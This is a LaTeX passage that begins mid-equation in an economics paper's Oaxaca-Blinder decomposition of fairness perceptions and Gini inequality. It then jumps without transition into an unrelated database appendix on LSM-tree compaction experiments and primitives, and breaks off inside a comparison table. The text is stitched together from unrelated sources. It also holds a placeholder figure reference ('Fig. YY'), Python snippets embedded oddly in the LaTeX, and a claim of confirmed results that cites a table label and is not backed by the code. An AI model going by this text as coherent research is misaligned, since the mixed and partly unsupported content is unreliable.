\underbrace{\hat{\beta}_{2002} (\bar{X}_{2013} - \bar{X}_{2002})}_{\equiv \Delta \text{Demog.}} +
\underbrace{\hat{\gamma}_{2002} (\overline{\text{Gini}}_{2013} - \overline{\text{Gini}}_{2002})}_{\equiv \Delta \text{Gini}} \notag \\ &+ \underbrace{\bar{X}_{2013} (\hat{\beta}_{2013} - \hat{\beta}_{2002})+ \overline{\text{Gini}}_{2013} (\hat{\gamma}_{2013} - \hat{\gamma}_{2002})}_{\text{Residual}}
\end{align}
The first two terms of equation \eqref{eq_oaxaca} are usually known as the ``composition effect.'' They capture the difference between the average perceptions in 2002 and the counterfactual perceptions in 2013 had the $\hat{\beta}$'s and $\hat{\gamma}$---i.e., the sensitivity of perceptions to the different covariates---remained constant during the 2002--13 period. The first term captures differences in the individual-level demographic variables that determine unfairness perceptions in the model (such as educational attainment, age, and employment status). The second term captures changes in aggregate trends in income inequality.
The third term of \eqref{eq_oaxaca} reflects the difference between the average fairness views in 2013 and the counterfactual fairness views obtained by applying the 2002 coefficients to the observable attributes of 2013. Thus, this component reflects changes in fairness views due to changes in the coefficients on the different covariates between both years. Since we cannot explain why the coefficients attached to each variable changed, this term is usually viewed as the ``unexplained'' part of the decomposition and treated as its residual.
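The accounting above can be sketched numerically. All coefficients and sample means below are made-up illustrations, and the covariate vector $X$ is collapsed to a single scalar for brevity.

```python
# Numerical sketch of the Oaxaca-Blinder accounting: the change in mean
# unfairness splits into a demographics term, a Gini term, and an
# (unexplained) residual, and the three components add up to the total.

def oaxaca(beta0, gamma0, x0, g0, beta1, gamma1, x1, g1):
    """Decompose (beta1*x1 + gamma1*g1) - (beta0*x0 + gamma0*g0)."""
    total = (beta1 * x1 + gamma1 * g1) - (beta0 * x0 + gamma0 * g0)
    d_demog = beta0 * (x1 - x0)                 # composition: covariates
    d_gini = gamma0 * (g1 - g0)                 # composition: inequality
    residual = x1 * (beta1 - beta0) + g1 * (gamma1 - gamma0)
    return total, d_demog, d_gini, residual

# Hypothetical 2002 (beta0, gamma0, means) and 2013 (beta1, gamma1, means)
change, d_demog, d_gini, resid = oaxaca(0.5, 1.0, 0.40, 0.55,
                                        0.3, 1.2, 0.50, 0.48)
```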
\section{Supplementary Experiments}
\begin{figure*}[!ht]
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.245\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/compaction/W1_quantile_compaction_latency_comp}.eps}
\vspace{-1cm}
\caption{Overall compaction latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.245\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/compaction/W1_quantile_compaction_cpu_latency_comp}.eps}
\vspace{-1cm}
\caption{CPU latency for compactions}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.245\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/point_query/W1_filter_block_cache_miss_comp}.eps}
\vspace{-1cm}
\caption{Block misses for point queries}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.245\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/point_query/W1_index_block_cache_miss_comp}.eps}
\vspace{-1cm}
\caption{Index misses for point queries}
\end{subfigure}
\vspace{-0.2cm}
\caption{(a,b) show the correlation between the overall latency for compactions and the CPU cycles spent on compactions; (c,d) show how the misses to the filter and index blocks change across different compaction strategies as the proportion of non-empty and empty queries changes in a lookup-only workload.}
\label{fig:W1-supp}
\end{figure*}
In this appendix, we present the supplementary results along with the auxiliary observations (\textbf{o}) that were omitted from the main paper due to space constraints.
In the interest of space, we limit our discussion to the most interesting results and observations.
For better readability, we re-use the subsection titles used in \S \ref{sec:results} throughout this appendix.
\subsection{Performance Implications}
Here we present the supplementary results for the serial execution of the ingestion-only and lookup-only workloads.
Details about the workload specifications along with the experimental setup can be found throughout \S \ref{subsec:performance}.
\Paragraph{\mob The CPU Cost for Compactions is Significant}
The CPU cycles spent on compactions (Fig. \ref{fig:W1-supp}(b)) amount to close to $50\%$ of the overall time spent for compactions (Fig. \ref{fig:W1-supp}(a), which is the same as Fig. \ref{fig:W1}(c)) regardless of the compaction strategy.
During a compaction job, CPU cycles are spent on (1) the preparation phase, which obtains the necessary locks and takes snapshots, (2) sort-merging the entries during the compaction, (3) updating the file pointers and metadata, and (4) synchronizing the output files after the compaction.
Among these, the time spent to sort-merge the data in memory dominates the other operations.
This explains the similarity in patterns between Fig. \ref{fig:W1-supp}(a) and \ref{fig:W1-supp}(b).
As both the CPU time and the overall time spent for compactions are driven by the total amount of data compacted, the plots look largely similar.
\Paragraph{\mob Dissecting the Lookup Performance}
To analyze the lookup performance presented in Fig.~\ref{fig:W1}(h), we further plot the block cache misses for Bloom filters blocks in Fig.~\ref{fig:W1-supp}(c), and the index (fence pointer) block misses in Fig.~\ref{fig:W1-supp}(d).
Note that both empty and non-empty lookups must first fetch the filter blocks; hence, the filter block misses remain almost unaffected as we vary $\alpha$.
Note that \texttt{Tier} has more misses because it has more sorted runs overall.
Subsequently, the index blocks are fetched only if the filter probe returns positive.
With $10$ bits-per-key the false positive rate is only $0.8\%$, and as we have more empty queries, i.e., increasing $\alpha$, fewer index blocks are accessed.
The filter blocks are maintained at the granularity of files and in our setup amount to $20$ I/Os.
The index blocks are maintained for each disk page and in our setup amount to $4$ I/Os, i.e., $1/5^{th}$ of the cost for fetching the filter blocks.\footnote{Filter block size per file = \#entries per file $\times$ bits-per-key = $512 \times 128 \times 10$ bits = $80$kB; index block size per file = \#pages per file $\times$ (key size $+$ pointer size) = $512 \times (16+16)$B = $16$kB.}
The cost for fetching the filter block is thus $5\times$ the cost for fetching the index block.
This, coupled with the probabilistic fetching of the index block (depending on $\alpha$ and the false positive rate ($FPR=0.8\%$) of the filter), leads to a non-monotonic latency curve for point lookups as $\alpha$ increases, and this behavior persists regardless of the compaction strategy.
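The index-fetch component of this cost can be captured with a back-of-the-envelope model. The per-file I/O counts follow the figures above; the model deliberately ignores block-cache effects, which are what ultimately make the measured curve non-monotonic, so it only shows how index fetches fade as $\alpha$ grows.

```python
# Expected I/O model for a point lookup against one file: the filter
# block is always read, and the index block is read only when the
# filter probe returns positive. alpha is the fraction of empty queries.

FILTER_IOS = 20      # 80 kB filter block / 4 kB pages
INDEX_IOS = 4        # 16 kB index block / 4 kB pages
FPR = 0.008          # ~0.8% false positive rate at 10 bits-per-key

def expected_ios(alpha):
    # Non-empty lookups (fraction 1 - alpha) always pass the filter;
    # empty lookups pass only on a false positive.
    p_index = (1 - alpha) + alpha * FPR
    return FILTER_IOS + p_index * INDEX_IOS
```

For example, the model yields 24 I/Os at $\alpha = 0$ and about $20.03$ at $\alpha = 1$, i.e., index fetches become negligible as empty queries dominate.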
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W18/W18.1_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W18_1_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W18/W18.1_write_delay_comp}.eps}
\caption{Write delay}
\label{fig:W18_1_write_delay}
\end{subfigure}
\vspace{-1em}
\caption{Varying Block Cache (insert-only)}
\label{fig:W18.1}
\end{figure}
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W18/W18.2_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W18_2_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W18/W18.2_write_delay_comp}.eps}
\caption{Write delay}
\label{fig:W18_2_write_delay}
\end{subfigure}
\vspace{-1em}
\caption{Varying Block Cache (interleaving with $10\%$ point lookups)}
\label{fig:W18.2}
\end{figure}
We vary the block cache size for insert-only and mixed workloads ($10\%$ existing point lookups interleaved with insertions). For the mixed workload, the mean compaction latency remains stable as the block cache varies from $8$MB to $256$MB. However, for the insert-only workload, the mean compaction latency increases sharply once the block cache exceeds $32$MB (Fig. \ref{fig:W18_1_mean_compaction_latency} and \ref{fig:W18_2_mean_compaction_latency}). We observe that for the insert-only workload, the write delay (also termed write stall) is more than twice that of the mixed workload (Fig. \ref{fig:W18_1_write_delay} and \ref{fig:W18_2_write_delay}). We leave this interesting phenomenon for future discussion. Compared to full and partial compaction, tiering is more stable with respect to different block cache sizes.
\subsection{Varying Page Size}
When we vary the page size, we observe almost identical patterns across the different compaction strategies for all metrics (Fig. \ref{fig:W19_1_mean_compaction_latency} and \ref{fig:W19_1_write_ampli}). It turns out that the compaction strategy does not play a significant role as the page size changes.
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W19/W19.1_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W19_1_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W19/W19.1_write_ampli_comp}.eps}
\caption{Write amplification}
\label{fig:W19_1_write_ampli}
\end{subfigure}
\vspace{-1em}
\caption{Varying Page Size (insert-only)}
\label{fig:W19.1}
\end{figure}
\subsection{Varying Size Ratio}
We also compare the performance for different size ratios. According to Fig. \ref{fig:W20_1_mean_compaction_latency}, tiering has a higher mean compaction latency than the other strategies when the size ratio is no more than $6$; beyond $6$, full compaction and oldest-file compaction become the two most time-consuming strategies. In terms of tail compaction latency (Fig. \ref{fig:W20_1_P100_compaction_latency}), tiering remains the worst among all strategies.
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/compaction/W20.1_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W20_1_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W20/W20.1_P100_compaction_latency_comp}.eps}
\caption{Tail compaction latency}
\label{fig:W20_1_P100_compaction_latency}
\end{subfigure}
\vspace{-1em}
\caption{Varying Size Ratio (insert-only)}
\label{fig:W20.1}
\end{figure}
\subsection{Varying Bits Per Key (BPK)}
We also conduct an experiment to investigate the influence of BPK on compaction. From Fig. \ref{fig:W21_2_mean_compaction_latency} and \ref{fig:W21_2_P100_compaction_latency}, the mean and tail compaction latencies may increase slightly with increasing bits per key, since larger filter blocks must be written; however, this increase is very small because the growth in filter blocks is much smaller than the total size of the data blocks. At the same time, we also observe that the query latency increases with increasing BPK (Fig. \ref{fig:W21_2_empty_get_latency} and \ref{fig:W21_2_existing_get_latency}). This might come from higher filter block misses (Fig. YY), and this pattern becomes more obvious for existing queries, in which case accessing filter blocks is purely extra overhead.
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W21/W21.2_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W21_2_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W21/W21.2_P100_compaction_latency_comp}.eps}
\caption{Tail compaction latency}
\label{fig:W21_2_P100_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W21/W21.3_empty_mean_get_latency_comp}.eps}
\caption{Mean get latency (empty queries)}
\label{fig:W21_2_empty_get_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W21/W21.3_existing_mean_get_latency_comp}.eps}
\caption{Mean get latency (existing queries)}
\label{fig:W21_2_existing_get_latency}
\end{subfigure}
\vspace{-1em}
\caption{Varying Bits Per Key (insert-only)}
\label{fig:W21.2}
\end{figure}
\subsection{Compaction Primitives}
We define a compaction strategy as \textit{an ensemble of design primitives that represents the fundamental decisions about the physical data layout and the data (re-)organization policy}.
Each primitive answers a fundamental design question.
\begin{itemize}[leftmargin=5mm]
\item[1)] \textit{Compaction trigger}: \textbf{When} to re-organize the data layout?
\item[2)] \textit{Data layout}: \textbf{How} to lay out the data physically on storage?
\item[3)] \textit{Compaction granularity}: \textbf{How much} data to move at-a-time during layout re-organization?
\item[4)] \textit{Data movement policy}: \textbf{Which} block of data to move during re-organization?
\end{itemize}
Together, these design primitives define \textit{when} and \textit{how} an LSM-engine re-organizes the data layout on the persistent media.
The proposed primitives capture any state-of-the-art LSM-compaction strategy and also enable synthesizing new or unexplored compaction strategies.
Below, we define these four design primitives.
\begin{figure*}
\vspace{-0.2in}
\centering
\includegraphics[width=\textwidth]{omnigraffle/primitives.pdf}
\vspace{-0.25in}
\caption{The primitives that define LSM compactions: trigger, data layout, granularity, and data movement policy.}
\label{fig:comp_prims}
\vspace{-0.1in}
\end{figure*}
\subsubsection{\textbf{Compaction Trigger}}
Compaction triggers refer to the set of events that can initiate a compaction job.
The most common compaction trigger is based on the \textit{degree of saturation} of a level in an LSM-tree~\cite{Alsubaiee2014,FacebookRocksDB,GoogleLevelDB,HyperLevelDB,Tarantool,Golan-Gueta2015,Sears2012}.
The degree of saturation for Level $i$ ($1 \leq i \leq L-1$) is typically measured as the ratio of the number of bytes of data stored in Level $i$ to the theoretical capacity in bytes for Level $i$.
Once the degree of saturation goes beyond a pre-defined threshold, one or more immutable files from Level $i$ are marked for compaction.
Some LSM-engines use the file count in a level to compute degree of saturation~\cite{GoogleLevelDB,Huang2019,HyperLevelDB,RocksDB2020,ScyllaDB}.
Note that the file count-based degree of saturation works only when all immutable files are of equal size, or for systems that have a tunable file size.
The ``\#sorted runs'' compaction trigger fires a compaction if the number of sorted runs (or ``tiers'') in a level goes past a predefined threshold, regardless of the size of the level.
Other compaction triggers include the \textit{staleness of a file}, the \textit{tombstone-based time-to-live}, and \textit{space} and \textit{read amplification}.
For example, to ensure propagation of updates and deletes to the deeper levels of a tree, some LSM-engines assign a time-to-live (TTL) for each file during its creation.
Each file can live in a level for a bounded time, and once the TTL expires, the file is marked for compaction~\cite{FacebookRocksDB}.
Another delete-driven compaction trigger ensures bounded persistence latency of deletes in LSM-trees through a different timestamp-based scheme.
Each file containing at least one tombstone is assigned a special time-to-live in each level, and upon expiration of this timer, the file is marked for compaction~\cite{Sarkar2020}.
Below, we present a list of the most common \textbf{compaction triggers}:
\begin{itemize} [leftmargin=5mm]
\item[i)] \textit{\textbf{Level saturation}}: level size goes beyond a nominal threshold
\item[ii)] \textit{\textbf{\#Sorted runs}}: sorted run count for a level reaches a threshold
\item[iii)] \textit{\textbf{File staleness}}: a file lives in a level for too long
\item[iv)] \textit{\textbf{Space amplification (SA)}}: overall SA surpasses a threshold
\item[v)] \textit{\textbf{Tombstone-TTL}}: files have expired tombstone-TTL
\end{itemize}
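As an illustration, the two most common triggers above (level saturation and \#sorted runs) can be sketched as a simple predicate. This is a hypothetical helper, not any engine's actual API, and the default threshold is an assumption:

```python
# Hypothetical sketch, not any engine's actual API: evaluating the two most
# common compaction triggers for a single level of an LSM-tree.

def should_compact(level_bytes, capacity_bytes, num_sorted_runs,
                   run_threshold, saturation_threshold=1.0):
    """Return True if the saturation- or run-count-based trigger fires."""
    # i) Level saturation: bytes stored vs. the level's theoretical capacity.
    if level_bytes / capacity_bytes > saturation_threshold:
        return True
    # ii) #Sorted runs: run count for the level reaches a threshold.
    if num_sorted_runs >= run_threshold:
        return True
    return False
```

Triggers such as file staleness or tombstone-TTL would extend the same predicate with per-file timestamp checks.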
\subsubsection{\textbf{Data layout}}
The data layout is driven by the compaction eagerness, and determines the data organization on disk by controlling the number of sorted runs per level.
Compactions move data between storage and memory, consuming a significant portion of the device bandwidth.
There is, thus, an inherent competition for the device bandwidth between ingestion (external) and compaction (internal) -- a trade-off depending on the eagerness of compactions.
The data layout is commonly classified as \emph{leveling} and
\emph{tiering}~\cite{Dayan2017,Dayan2018a}.
With leveling, once a compaction is triggered in Level $i$, the file(s) marked for compaction are merged with the overlapping file(s) from Level $i+1$, and the result is written back to Level $i+1$.
As a result, Level $i+1$ ends up with a (single) longer sorted run of immutable files~\cite{FacebookRocksDB,Golan-Gueta2015,GoogleLevelDB,Huang2019,HyperLevelDB,Sears2012}.
With tiering, each level may contain more than one sorted run with overlapping key domains.
Once a compaction is triggered in Level $i$, all sorted runs in Level $i$ are merged together and the result is written to Level $i+1$ as a new sorted run without disturbing the existing runs in that level~\cite{Alsubaiee2014,ApacheCassandra,ApacheHBase,FacebookRocksDB,ScyllaDB,Tarantool}.
A hybrid design is proposed in Dostoevsky~\cite{Dayan2018} where the last level is implemented as leveled and all the remaining levels on disk are tiered.
A generalization of this idea is proposed in the literature as a continuum of designs~\cite{Dayan2019,Idreos2019} that allows each level to separately decide between leveling and tiering.
Among production systems, RocksDB implements the first disk-level (Level $1$) as tiering~\cite{RocksDB2020}, and it is allowed to grow perpetually in order to avoid write-stalls~\cite{Balmau2019,Balmau2020,Callaghan2017} in ingestion-heavy workloads.
Below is a list of the most common options for \textbf{the data layout}:
\begin{itemize} [leftmargin=5mm]
\item[i)] \textit{\textbf{Leveling}}: one sorted run per level
\item[ii)] \textit{\textbf{Tiering}}: multiple sorted runs per level
\item[iii)] \textit{\textbf{\bm{$1$}-leveling}}: \textit{tiering} for Level $1$; \textit{leveling} otherwise
\item[iv)] \textit{\textbf{\bm{$L$}-leveling}}: \textit{leveling} for last level; \textit{tiering} otherwise
\item[v)] \textit{\textbf{Hybrid}}: a level can be \textit{tiering} or \textit{leveling} independently
\end{itemize}
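To make the leveling/tiering trade-off concrete, the following toy simulation (our own sketch, not code from any LSM engine) flushes unit-sized runs into a tree with size ratio $T$ and counts the total bytes written to storage, from which write amplification follows:

```python
# Toy model: leveling merges into one run per level (rewriting it on every
# incoming run), while tiering accumulates up to T runs before merging.

def simulate(n_flushes, T, layout):
    levels = []   # levels[i] holds the run sizes currently in Level i+1
    written = 0   # total bytes written to storage
    for _ in range(n_flushes):
        run, i = 1, 0          # a unit-sized run is flushed from memory
        while True:
            if len(levels) <= i:
                levels.append([])
            if layout == "leveling":
                # merge the incoming run with the level's single sorted run
                merged = run + sum(levels[i])
                levels[i] = [merged]
                written += merged
                if merged < T ** (i + 1):
                    break              # level not yet saturated
                run, levels[i], i = merged, [], i + 1   # spill downward
            else:  # tiering: just append a new sorted run
                levels[i].append(run)
                written += run
                if len(levels[i]) < T:
                    break              # fewer than T runs, no compaction
                run, levels[i], i = sum(levels[i]), [], i + 1
    return written / n_flushes         # write amplification
```

Running the model confirms the analysis in Section~\ref{tab:perf}'s spirit: leveling rewrites each entry roughly $T$ times per level, so its write amplification dominates tiering's for the same workload.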
\subsubsection{\textbf{Compaction Granularity}}
Compaction granularity refers to the amount of data moved during a single compaction job.
One way to compact data is by sort-merging and moving all data from a level to the next level -- we refer to this as \textit{full compaction}~\cite{Alkowaileet2020,Alsubaiee2014,Teng2017,WiredTiger}.
This results in periodic bursts of I/Os due to large data movement during compactions, and as a tree grows deeper, the latency spikes are exacerbated causing prolonged write stalls.
To amortize the I/O costs due to compactions, leveled LSM-based engines employ \textit{partial compaction}~\cite{FacebookRocksDB,GoogleLevelDB,Huang2019,ONeil1996,Sarkar2020,ScyllaDB}, where instead of moving a whole level, a smaller granularity of data participates in every compaction.
The granularity of data can be a single file~\cite{Dong2017,Huang2019,Sarkar2020} or multiple files~\cite{Alkowaileet2020,Alsubaiee2014,ApacheCassandra,ONeil1996} depending on the system design and the workload.
Note that partial compaction does not radically change the total amount of data movement due to compactions, but amortizes this data movement uniformly over time, thereby preventing undesired latency spikes.
A compaction granularity of ``sorted runs'' applies principally to LSMs with lazy merging policies.
Once a compaction is triggered in Level $i$, all sorted runs (or tiers) in Level $i$ are compacted together, and the resulting entries are written to Level $i+1$ as a new immutable sorted run.
Below, we present a list of the most common \textbf{compaction granularity} options:
\begin{itemize} [leftmargin=5mm]
\item[i)] \textit{\textbf{Level}}: all data in two consecutive levels
\item[ii)] \textit{\textbf{Sorted runs}}: all sorted runs in a level
\item[iii)] \textit{\textbf{File}}: one sorted file at a time
\item[iv)] \textit{\textbf{Multiple files}}: several sorted files at a time
\end{itemize}
\subsubsection{\textbf{Data Movement Policy}}
When \textit{partial compaction} is employed, the data movement policy selects
which file(s) to choose for compaction.
While the literature commonly refers to this decision as \textit{file picking policy}~\cite{Dong2016}, we use the term \textit{data movement} to generalize for any possible data movement granularity.
A na\"ive way to choose file(s) is at random or by using a round-robin policy~\cite{GoogleLevelDB,HyperLevelDB}.
These data movement policies do not focus on optimizing for any particular performance metric, but help in reducing space amplification.
To optimize for read throughput, many production data stores~\cite{Huang2019,FacebookRocksDB} select the ``coldest'' file(s) in a level once a compaction is triggered.
Another common optimization goal is to minimize write amplification.
In this policy, files with the least overlap with the target level are marked for compaction~\cite{Callaghan2016,Dong2016}.
To reduce space amplification, some storage engines choose files with the highest number of tombstones and/or updates~\cite{FacebookRocksDB}.
Another delete-aware approach introduces a tombstone-age driven file picking policy that aims to timely persist logical deletes~\cite{Sarkar2020}.
Below, we present the list of the common \textbf{data movement policies}:
\begin{itemize} [leftmargin=5mm]
\item[i)] \textit{\textbf{Round-robin}}: chooses files in a round-robin manner
\item[ii)] \textit{\textbf{Least overlapping parent}}: file with least overlap with ``parent''
\item[iii)] \textit{\textbf{Least overlapping grandparent}}: as above with ``grandparent''
\item[iv)] \textit{\textbf{Coldest}}: the least recently accessed file
\item[v)] \textit{\textbf{Oldest}}: the oldest file in a level
\item[vi)] \textit{\textbf{Tombstone density}}: file with \#tombstones above a threshold
\item[vii)] \textit{\textbf{Tombstone-TTL}}: file with expired tombstones-TTL
\end{itemize}
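As a sketch of how a data movement policy operates, the ``least overlapping parent'' policy can be expressed as follows. Representing file metadata as key-range tuples is an assumption for illustration, not any engine's actual format:

```python
# Illustrative sketch of the "least overlapping parent" policy: pick the
# file in Level i whose key range overlaps the fewest files in Level i+1,
# minimizing the merge work of the resulting compaction job.

def pick_least_overlapping(level_i, level_i1):
    """Each file is a (min_key, max_key) tuple; returns an index into level_i."""
    def overlap_count(f):
        lo, hi = f
        # two closed key ranges overlap iff each starts before the other ends
        return sum(1 for (lo2, hi2) in level_i1 if lo <= hi2 and lo2 <= hi)
    return min(range(len(level_i)), key=lambda j: overlap_count(level_i[j]))
```

The ``least overlapping grandparent'' variant is identical except that it counts overlaps against Level $i+2$.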
\subsection{Compaction as an Ensemble of Primitives}
Every compaction strategy takes one or more values for each of the four primitives.
The trigger, granularity, and data movement policy are multi-valued primitives, whereas data layout is single-valued.
For example, a common LSM design~\cite{Alkowaileet2020} has a \textbf{leveled} LSM-tree (\textit{data layout}) that compacts \textbf{whole levels} at a time (\textit{granularity}) once a \textbf{level reaches a nominal size} (\textit{trigger}).
This design does not implement many subtle optimizations including partial compactions, and by definition, does not need a data movement policy.
A more complex example is the compaction strategy for a \textbf{leveled} LSM-tree (\textit{data layout}) in which compactions are performed at the \textit{granularity} of a \textbf{file}.
A compaction is \textit{triggered} if either (a) a \textbf{level reaches its capacity} or (b) a \textbf{file containing tombstones is retained in a level longer than a pre-set TTL}~\cite{Sarkar2020}.
Once triggered, the \textit{data movement policy} chooses (a) \textbf{the file with the highest density of tombstones}, if there is one or (b) \textbf{the file with the least overlap with the parent level}, otherwise.
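The ensemble view above can be encoded directly. The sketch below is our illustrative encoding, not an implementation detail of any system; it represents the delete-aware strategy just described as concrete values of the four primitives:

```python
# Our illustrative encoding of a compaction strategy as an ensemble of the
# four primitives (trigger, data layout, granularity, data movement policy).
from dataclasses import dataclass

@dataclass(frozen=True)
class CompactionStrategy:
    triggers: tuple          # multi-valued primitive
    data_layout: str         # single-valued primitive
    granularity: tuple       # multi-valued primitive
    movement_policy: tuple   # multi-valued; empty for full compaction

# The delete-aware strategy described above, expressed as an ensemble:
lethe = CompactionStrategy(
    triggers=("level saturation", "tombstone-TTL"),
    data_layout="leveling",
    granularity=("file",),
    movement_policy=("tombstone density", "least overlapping parent"),
)
```

Enumerating the admissible values of each field is what yields the design-space cardinality discussed next.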
\begin{table}[t]
\centering
\resizebox{0.475\textwidth}{!}{%
\LARGE
\begin{tabular}{l|c|ccccc|cccc|cccccccc}
\toprule
\multicolumn{1}{c|}{\multirow{9}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Database} \end{tabular}}}
& \multirow{9}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Data layout} \end{tabular}}
& \multicolumn{5}{c|}{\textbf{\multirow{1}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Compaction} \end{tabular}}}}
& \multicolumn{4}{c|}{\textbf{\multirow{1}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Compaction} \end{tabular}}}}
& \multicolumn{7}{c}{\textbf{\multirow{1}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Data Movement} \end{tabular}}}} \\
\multicolumn{1}{c|}{}
& \multicolumn{1}{c|}{}
& \multicolumn{5}{c|}{\textbf{Trigger}}
& \multicolumn{4}{c|}{\textbf{Granularity}}
& \multicolumn{7}{c}{\textbf{Policy}} \\ \cline{3-19}
&
& \rotatebox[origin=l]{90}{Level saturation}
& \rotatebox[origin=l]{90}{\#Sorted runs}
& \rotatebox[origin=l]{90}{File staleness}
& \rotatebox[origin=l]{90}{Space amp.}
& \rotatebox[origin=l]{90}{Tombstone-TTL\hspace*{1mm}}
& \rotatebox[origin=l]{90}{Level}
& \rotatebox[origin=l]{90}{Sorted run}
& \rotatebox[origin=l]{90}{File (single)}
& \rotatebox[origin=l]{90}{File (multiple)}
& \rotatebox[origin=l]{90}{Round-robin}
& \rotatebox[origin=l]{90}{Least overlap ($+$$1$) }
& \rotatebox[origin=l]{90}{Least overlap ($+$$2$)}
& \rotatebox[origin=l]{90}{Coldest file}
& \rotatebox[origin=l]{90}{Oldest file}
& \rotatebox[origin=l]{90}{Tombstone density}
& \rotatebox[origin=l]{90}{Expired TS-TTL}
& \rotatebox[origin=l]{90}{N/A (entire level)} \\ \hline \bottomrule
\multirow{2}{*}{RocksDB~\cite{FacebookRocksDB},}
& \multirow{1}{*}{Leveling /}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{} & \multirow{2}{*}{\cmark}
& \multirow{2}{*}{} & {} & {}
& {} & \multirow{2}{*}{\cmark} & \multirow{2}{*}{\cmark} & {}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{} & \multirow{2}{*}{\cmark}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{\cmark} & {} \\
\multirow{2}{*}{Monkey~\cite{Dayan2018a}}
& \multirow{1}{*}{1-Leveling} & & & & & & & & & & \\ \cline{2-19}
& \multirow{1.2}{*}{Tiering} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & {} & {} & {} & {} & \multirow{1.2}{*}{\cmark} \\ \midrule
\multirow{1}{*}{LevelDB~\cite{GoogleLevelDB},}
& \multirow{2}{*}{Leveling}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{} & {}
& {} & {} & {}
& {} & \multirow{2}{*}{\cmark} & \multirow{2}{*}{} & \multirow{2}{*}{\cmark}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{\cmark} & {}
& {} & {} & {} \\
\multirow{1}{*}{Monkey (J.)~\cite{Dayan2017}}
& {} & & & & & & & & & & \\ \midrule
SlimDB~\cite{Ren2017}
& {Tiering}
& \cmark & {} & {}
& {} & {} & {}
& {} & \cmark & \cmark & {}
& {} & {} & {}
& {} & {} & {} & \cmark \\ \midrule
Dostoevsky~\cite{Dayan2018}
& $L$-leveling & {\cmark$^{L}$} & {\cmark$^{T}$}
& {} & {} & {}
& {\cmark$^{L}$} & {\cmark$^{T}$} & {} & {}
& {} & {\cmark$^{L}$} & {}
& {} & {} & {} & {} & {\cmark$^{T}$} \\ \midrule
LSM-Bush~\cite{Dayan2019}
& {Hybrid leveling} & {\cmark$^{L}$} & {\cmark$^{T}$}
& {} & {} & {}
& {\cmark$^{L}$} & {\cmark$^{T}$} & {} & {}
& {} & {\cmark$^{L}$} & {}
& {} & {} & {} & {} & {\cmark$^{T}$} \\ \midrule
Lethe~\cite{Sarkar2020}
& Leveling
& \cmark & {}
& {} & {} & {\cmark} &
& {} & \cmark & \cmark & {}
& {\cmark} & & &
& & \cmark \\ \midrule
Silk~\cite{Balmau2019}, Silk+~\cite{Balmau2020}
& {Leveling}
& {\cmark} & {}
& {} & {} & {} & {}
& {} & {\cmark} & {\cmark} & {\cmark}
& {} & {} & {} & {}
& {} & {} \\ \midrule
HyperLevelDB~\cite{HyperLevelDB}
& {Leveling} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {\cmark} & {}
& {\cmark} & {\cmark} & {\cmark}
& {} & {} & {} \\ \midrule
PebblesDB~\cite{Raju2017}
& {Hybrid leveling} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {\cmark} & {\cmark}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
\multirow{2}{*}{Cassandra~\cite{ApacheCassandra}}
& \multirow{1}{*}{Tiering}
& {} & {\cmark}
& {\cmark} & {} & {\cmark}
& {} & {\cmark} & {} & {}
& {} & {} & {}
& {} & {} & {} &{} &{\cmark}
\\ \cline{2-19}
